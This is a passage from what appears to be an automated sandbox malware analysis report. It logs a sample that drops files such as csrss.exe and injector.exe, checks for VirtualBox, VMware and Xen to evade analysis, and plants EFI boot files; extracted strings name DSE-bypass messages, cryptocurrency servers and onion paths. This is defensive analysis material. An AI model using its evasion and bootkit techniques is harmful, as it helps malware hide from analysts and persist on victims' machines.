        Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\windefender.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\windefender.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\windefender.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\windefender.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: TOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PARAMETER WITH GC PROG
        Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: ... OMITTING ACCEPT-CHARSETAFTER EFIGUARDALLOCFREETRACEBAD RST MARKERBAD ALLOCCOUNTBAD RECORD MACBAD SPAN STATEBAD STACK SIZEBTC.USEBSV.COMCERT INSTALLEDCHECKSUM ERRORCONTENT-LENGTHCOULDN'T PATCHDATA TRUNCATEDDISTRIBUTOR_IDDRIVER REMOVEDEXIT STATUS -1FILE TOO LARGEFINALIZER WAITGCSTOPTHEWORLDGETPROTOBYNAMEGOT SYSTEM PIDINITIAL SERVERINTERNAL ERRORINVALID SYNTAXIS A DIRECTORYKEY SIZE WRONGLEVEL 2 HALTEDLEVEL 3 HALTEDLOOKUP TXT: %WMEMPROFILERATENEED MORE DATANIL ELEM TYPE!NO MODULE DATANO SUCH DEVICEPARSE CERT: %WPROTOCOL ERRORREAD CERTS: %WREPORT_ID IS 0RUNTIME: BASE=RUNTIME: FULL=S.ALLOCCOUNT= SEMAROOT QUEUESERVER.VERSIONSTACK OVERFLOWSTOPM SPINNINGSTORE64 FAILEDSYNC.COND.WAITTEXT FILE BUSYTIMEENDPERIODTOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PARAMETER WITH GC PROG
        Source: upd.exe, csrss.exe Binary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETESTING KEYTTL EXPIREDVBOXSERVICEVMUSRVC.EXEVT_RESERVEDVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEALARM CLOCKAPPLICATIONBAD ADDRESSBAD MESSAGE
        Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETESTING KEYTTL EXPIREDVBOXSERVICEVMUSRVC.EXEVT_RESERVEDVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEALARM CLOCKAPPLICATIONBAD ADDRESSBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCOMPAIGN_IDCREATED BY CRYPT32.DLLDNSMESSAGE.E2.KEFF.ORGEMBEDDED/%SFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGET CDN: %WGETPEERNAMEGETSOCKNAMEHTTPS_PROXYI/O TIMEOUTLOCAL ERRORLOST MCACHEMSPANMANUALMETHODARGS(MSWSOCK.DLLNEXT SERVERNIL CONTEXTORANNIS.COMPARSE ERRORPROCESS: %SRAW-CONTROLREFLECT.SETRETRY-AFTERRUNTIME: P RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSERVICE: %SSHELL32.DLLSHORT WRITETASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUSERENV.DLLVERSION=183WININET.DLLWUP_PROCESS (SENSITIVE) [RECOVERED] ALLOCCOUNT FOUND AT *( GCSCANDONE M->GSIGNAL= MINTRIGGER= NDATAROOTS= NSPANROOTS= PAGES/BYTE
        Source: upd.exe, csrss.exe Binary or memory string: TOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PAR
        Source: C:\Windows\System32\svchost.exe TID: 6648 Thread sleep time: -240000s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe TID: 752 Thread sleep time: -59000s >= -30000s
        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
        Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: B:\EFI\Boot\old.efi (copy)
        Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\EFI\Boot\EfiGuardDxe.efi
        Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\EFI\Boot\bootx64.efi
        Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\EFI\Microsoft\Boot\bootmgfw.efi
        Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: B:\EFI\Microsoft\Boot\fw.efi (copy)
        Source: C:\Windows\rss\csrss.exe Registry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
        Source: C:\Users\user\Desktop\upd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
        Source: C:\Users\user\Desktop\upd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
        Source: C:\Users\user\Desktop\upd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
        Source: C:\Windows\rss\csrss.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
        Source: C:\Windows\windefender.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
        Source: C:\Users\user\Desktop\upd.exe Process information queried: ProcessInformation
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019D5C10 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,
        Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 74a95330c532692c7cf7a70ce16db670, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:57:09, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Tools-All, Applicable: NeedsParent, Disposition: Staged
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: too many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero parameter with GC prog
        Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:57:09, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V, Intended State: Staged
        Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 962ff8519dbe320490c8b5e46ae96eb5, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: csrss.exe Binary or memory string: rinvalid locationloopbackmac_addrmountainmountvolmsvmmoufnamelessno anodeno-cacheno_proxyopPseudopolishedraw-readreadfromrecvfromrestlessrunnableruntime.scavengeshutdownsolitarystrconv.taskkilltwilightunixgramunknown(usernamevmmemctlvmx_svgawitheredwsaioctlwua
        Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Hypervisor, current State: Default, new state: Off, RemovePayload: 0
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: (MISSING)(unknown)+infinity, newval=, oldval=-07:00:00-infinity/api/cdn?/api/poll244140625: status=; Domain=Accuracy(AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExecQueryFindCloseForbiddenGetDIBitsHex_DigitInheritedInstMatchInstRune1InterfaceKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanNot FoundOP_RETURNOSCaptionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:ascii:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:]atomicor8b.ooze.ccbad indirbillowingbroadcastbus errorbutterflychallengechan sendcomplex64connectexcopystackcsrss.exectxt != 0d.nx != 0ecdsa.netempty urlfn.48.orgfodhelperfork/execfuncargs(gdi32.dllimage/gifimage/pnginterfaceinterruptipv6-icmplingeringlocalhostmSpanDeadmSpanFreemulticastnew tokennil errorntdll.dllole32.dllomitemptypanicwaitpatch.exepclmulqdqprecisionprintableprotocol psapi.dllraw-writereboot inrecover: reflect: resonancerwxrwxrwxscheduledsmb startsnowflakesparklingsucceededtask %+v
        Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: a39411adbcba7770488faca4732df809, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:42, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V-Hypervisor, Intended State: Staged
        Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients-63, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Default
        Source: csrss.exe Binary or memory string: nInUseno resultsnot a boolnot signedowner diedprl_cc.exeres binderres masterresumptionrune <nil>runtime: gschedtracesemacquireset-cookiesetsockoptsocks bindterminatedtracefree(tracegc() unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wwildflowerws2_
        Source: csrss.exe Binary or memory string: epslicesmallsmokesnowysockssoundsse41sse42ssse3stilltext/tls13tls: totaluint8usageuser=utf-8valuevmusbvmx86voicewaterwhitewispywriteyoung (MB) Value addr= base code= ctxt: curg= goid jobs= list= m->p= next= p->m= prev= span=%s: %s(...) , not , val -BEFV--DY
        Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V, Applicable: NeedsParent, Disposition: Staged
        Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Windows-RemoteFX-Graphics-Virtualization-Host, Applicable: NeedsParent, Disposition: Staged
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> ancientany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scrimsonderivedexpiresfallingfeatherfireflyfloat32float64gctraceglitterhttp://id is 0invalidkdu.exelookup max-agemorningnil keynop -> number panic: patientrefererrefreshrunningserial:server=signal silencesvc_versyscallthundertraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwsarecvwsasendwup_verxen: %wxennet6 data=%q etypes goal
        Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: d3310f7470f5cc3e99866abe683b453d, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:42, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-All, Intended State: Staged
        Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Services, new state: Off
        Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Merge into existing execution package for Package: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, existing TargetedState: Staged, new TargetedState: Staged
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaClass(CommonCookieCopticDELETEExpectFltMgrFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaProgidRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFVT(%d)WINDIRWinMonWinmon[]byte\??\%s\csrss\ufffd
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: de764c40154bbe38bec34936ef639ab9, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 2679350ec0edae52ee03c1daaf55d8c2, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 878b2f9862ce158a90aa7b5c871b772e, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V, new state: Off
        Source: csrss.exeBinary or memory string: ikiPRIORITYParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUgariticVBoxWddmVT_ARRAYVT_BYREFWSAIoctlWinmonFS[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnumacceptexa
        Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: to unallocated span%%!%c(*big.Float=%s)%s\Sysnative\cmd.exe37252902984619140625Arabic Standard TimeAzores Standard TimeCertFindChainInStoreCertOpenSystemStoreWChangeServiceConfigWCheckTokenMembershipCreateProcessAsUserWCryptAcquireContextWDHT has wrong lengthDQT has wrong lengthDRI has wrong lengthEgyptian_HieroglyphsEnumProcessModulesExFileTimeToSystemTimeGetAcceptExSockaddrsGetAdaptersAddressesGetCurrentDirectoryWGetFileAttributesExWGetModuleFileNameExWGetModuleInformationGetProcessMemoryInfoGetWindowsDirectoryWIDS_Trinary_OperatorInsufficient StorageIsrael Standard TimeJordan Standard TimeMAX_HEADER_LIST_SIZEMalformed JSON errorMediapartners-GoogleMeroitic_HieroglyphsNtUnmapViewOfSectionNtWriteVirtualMemoryOffline Explorer/2.5ProcessIdToSessionIdQueryServiceConfig2WQueryServiceStatusExRegisterEventSourceWRequest URI Too LongRtlInitUnicodeStringSHGetKnownFolderPathSOF has wrong lengthSOS has wrong lengthSafeArrayDestroyDataSafeArrayGetElemsizeSeek: invalid offsetSeek: invalid whenceSetCurrentDirectoryWSetHandleInformationSetVolumeMountPointWTaipei Standard TimeTerminal_PunctuationTurkey Standard TimeUnprocessable EntityWinmonProcessMonitor[invalid char class]\\.\pipe\VBoxTrayIPCasn1: syntax error: bad defer size classbad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)close of nil channelconnection error: %sconnection timed outcouldn't disable DSEcouldn't get IsAdmincouldn't get serverscouldn't run servicecouldn't set IsAdmincouldn't set serverscouldn't stop PsaSvccouldn't write patchelectrum.hsmiths.comelectrum.taborsky.czelectrum.villocq.comflag: help requestedfloating point errorforcegc: phase errorgc_trigger underflowgetadaptersaddressesgo of 
nil func valuegopark: bad g statusgzip: invalid headerheader line too longhttp2: stream closedinvalid repeat countinvalid request codeis a named type filejson: Unmarshal(nil json: Unmarshal(nil)key has been revokedmSpanList.insertBackmalformed ciphertextmalloc during signalmultiple SOF markersno such struct fieldnon-empty swept listnorm: invalid whencenot an integer classnotetsleep not on g0number has no digitsnumber of componentsp mcache not flushedpacer: assist ratio=pad length too largepreempt off reason: reflect.Value.SetIntreflect.makeFuncStubrequest file CDN: %wroot\SecurityCenter2runtime: casgstatus runtime: double waitruntime: unknown pc semaRoot rotateRightshort segment lengthsystemdrive is emptytime: invalid numbertrace: out of memoryunexpected network: unknown address typeuser is not an adminverifier host cachedwirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not foundzlib: invalid header gp.gcscanvalid=true
        Source: csrss.exeBinary or memory string: time: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (default %q) (default %v) MB released MB) wo
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:57, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-All, Intended State: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:55, Info CBS Exec: Skipping Package: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 350d2f419bdddcb6a98b096b17a5e4ec because it is already in the correct state.
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 6f103d2215911a17c9aeb968bbb7f0f6, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:55, Info CBS Exec: Package: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wwildflowerws2_32.dll of size (targetpc= ErrCode=%v a.npages= b.npages= bytes ...
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 6c8ed4d2fcb42a918382a31f6ce603ca, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: NonTransitionalNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePartial ContentProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-All, Intended State: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 8adcd7c28d228e17a421ad9e66bf8586, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:42, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V-Services, Intended State: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 38d80af2e352703d5d4e13c0bc9c4856, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 38d80af2e352703d5d4e13c0bc9c4856 because it is already in the correct state.
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V_base, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Default
